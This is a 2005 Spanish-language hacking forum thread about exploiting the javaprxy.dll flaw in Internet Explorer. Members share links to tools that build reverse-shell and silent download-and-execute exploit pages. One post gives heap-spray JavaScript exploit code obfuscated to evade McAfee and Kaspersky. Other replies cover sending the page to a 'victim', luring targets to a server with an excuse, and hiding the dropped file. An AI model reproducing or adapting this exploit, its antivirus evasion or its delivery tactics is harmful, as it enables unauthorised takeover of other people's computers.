Tema destacado: [Overclocking] Récords de overclock del foro
 Autor
|
Tema: Exploits reverse shell y downloader javaprxy.dll (Leído 3,419 veces)
|
El_ente
 Desconectado
Mensajes: 31
|
Bueno, pues he escrito un programilla en VB, que te permite poner tu ip y te crea un html con la reverse shell al puerto 8721. El código fuente está incluido por si alguien prefiere modificar algo antes de compilarlo. La dirección es : http://juaker.hopto.org/download/javaExploiter.rar -->Actualizado, ya no lo detectan los antivirus gracias a Beford Este baja y ejecuta un archivo en silencio de hasta 2,2Mb. También es configurable... http://juaker.hopto.org/download/javaExploiter_downloader.rar -->Actualizado, ya no lo detectan los antivirus gracias a Beford Y éste es el que me ha ayudado a hacer los otros dos. Este quita los saltos de línea en las shellcodes, tambien quita "\x, convierte cadenas decimales a hexadecimales y a utf-16, XORea ips, etc. Va muy bién si quereis probar vuestras shellcodes. http://juaker.hopto.org/download/utf-16.rarUn saludo y dar las gracias a Gospel por su tutorial de intrusion en redes, ya que lo he usado para aprender a pasar de hex a utf-16..... Un saludo tambien, como no a mi viejo amigo Rojodos... |
|
|
|
« Última modificación: 14 Julio 2005, 17:27 por El_ente »
|
En línea
|
|
|
|
|
Gospel
|
Gracias a ti por publicar tu programilla.
Facilita bastante las labores de tratamiento de la shellcode UTF-16 del exploit...
Salu2
|
|
|
|
|
En línea
|
|
|
|
lirkuid
Desconectado
Mensajes: 16
|
Wenas  antes de nada gracias a El_ente por publicar su programa que facilita bastante el cambio de la shellcode, weno mi duda es la siguiente: cambie la shellcode primero a mano siguiente el tuto de Gospel feat Loredo xDDD y probe el exploit en varios pc´s y no me funcionaba redireccione el puerto del router y todo. Entonces pense sera que algo hare mal pero ahora he probao a hacerlo con el programa de El_ente y tampoko me sale ¿alguien tiene idea de porque puede ser? Gracias de antemano.Saludos |
|
|
|
|
En línea
|
|
|
|
El_ente
Desconectado
Mensajes: 31
|
Lirkuid en el foro de cyruxnet también lo estamos testeando, y, bueno, en algunas máquinas funciona y en otras no. Lo que esta claro es que este exploit necesita bastante memoria virtual para ejecutarse. Un compañero(Curioso de nick), probó con un pentium 800 Mhz y 128Mb de ram y no le funciona, sin embargo en otra máquina que tiene mas grande(No la especificó) según él va como la seda. Yo las pruebas, las he hecho con un pentium 2000Mhz y 512Mb de ram, y como dice Curioso, va como la seda... Otra cosa, si la haces a mano, la línea: shellcode = unescape("%u4343%u4343" + la tienes que dejar tal y como está, o sea la shellcode empieza a partir de ahí. PD: No hay de qué, para eso se hacen los programas, para publicarlos. |
|
|
|
« Última modificación: 13 Julio 2005, 18:00 por El_ente »
|
En línea
|
|
|
|
beford
Desconectado
Mensajes: 3
|
soy nuevo aqui  bueno yo tambien hice esto de cambiarle el payload hace un par de dias al exploit, gracias al manual de Gospel tambien queria darle una sugerencia, para que el anivirus no detecte el exploit (estoy seguro que el mcafee no lo detecta), modifique ciertas cosas. <html><body><SCRIPT>
shllcd = unescape("sh3llc0de");
bgblck = unescape("%u0D0D%u0D0D");
slckspc = 20+shllcd.length;
while (bgblck.length<slckspc) bgblck+=bgblck;
fllblck = bgblck.substring(0, slckspc);
blck = bgblck.substring(0, bgblck.length-slckspc);
while(blck.length+slckspc<0x40000) blck = blck+blck+fllblck;
mmry = new Array();
for (i=0;i<750;i++) mmry[i] = blck + shllcd;
</SCRIPT></body><script>document.write("<object classid='CLSID:03D"+"9F3F2-B0"+"E3-11D2-B"+"081-00600"+"8039"+"BF0'></object>");window.location=window.location;</script></html>
como pueden ver le cambie los nombres a las varialbles, modifique pequeñas partes del codigo (casi nada), y por ultimo cambie la manera como se carga el objeto, porque me di cuenta de que el mcafee detectaba el CLSID del javaprxy y te lo mostraba como Exploit-IE/Javaprxy automaticamente. no he visto bien el codigo porque el mcafee me borro el archivo .frm xD pero ahora le echo un vistazo |
|
|
|
|
En línea
|
|
|
|
El_ente
Desconectado
Mensajes: 31
|
Si señor beford.... Probado con Mcafee Virus Scan Enterprise, ni lo huele.
El Kaspersky, ni lo huele...
Esta es la clase de colaboración que gusta, así que no sabes ni cómo te lo agradezco.
Ahora mismo estoy en el curro, que por cierto, lo he probado en un PII con 130 Mb de ram y ha dado la reverse shell, pero en cuanto llegue a casa haré las actualizaciones y las subiré.
Por supuesto, también actualizaré los agradecimientos...
Un saludo.
|
|
|
|
« Última modificación: 14 Julio 2005, 10:07 por El_ente »
|
En línea
|
|
|
|
|
|
Isirius
Ex-Staff
Desconectado
Mensajes: 2.492
|
El_ente bueno es una pregunta que no me va ese de la reverse shell en ese puerto lo creo como .html lo envio a la victima yen mi pc pongo ese puerto a la escucha pero nada me ayudas por favor este es mi email. Isirius_@hotmail.com gracias |
|
|
|
|
En línea
|
|
|
|
El_ente
Desconectado
Mensajes: 31
|
Bueno, en teoría debería funcional localmente, o sea si la persona a la que se lo mandas hace doble click en el html, pero lo suyo es subirlo a un servidor web y llevar a esa persona hasta allí con alguna excusa.
Aunque tengo que decirte que esta vulnerabilidad ya esta parcheada, y si tu amigo tiene el windows update en automático, ya no funcionará.
Un saludo.
PD: que manía de dar las direcciones de correo a los cuatro vientos, aparte de los spammers alguien que te quiera mal te puede dar un susto. Si nunca enseñas tu ip a destajo, menos enseñes tu correo, por ahi es por donde suelen entrar los virus casi siempre.
|
|
|
|
« Última modificación: 31 Julio 2005, 22:14 por El_ente »
|
En línea
|
|
|
|
kicking people
Desconectado
Mensajes: 211
|
Disculpen mi torpeza, pero no entiendo que es lo que hace este exploit se me mezclaron las cosas con eso de que descarga un .exe y con eso de la reverse shell, me gustaria saber que es lo que hace este expliot para comprenderlo un poco mejor
|
|
|
|
|
En línea
|
|
|
|
elconejolento
Desconectado
Mensajes: 1
|
hola
quisiera saber si se puede modificar el exploit que es para bajar y ejecutar , estuve leyendo el codigo y no encontre
donde le da la ruta para grabarlo.
porque me gustaria cabiarle el nombre al archiovo que baja (en ves de x , poner otro nombre ), y cambiarle la ruta donde lo baja, ya que en el escritorio que es donde queda se ve facilmente.
y los felicito por el foro.
|
|
|
|
|
En línea
|
|
|
|
|
 |
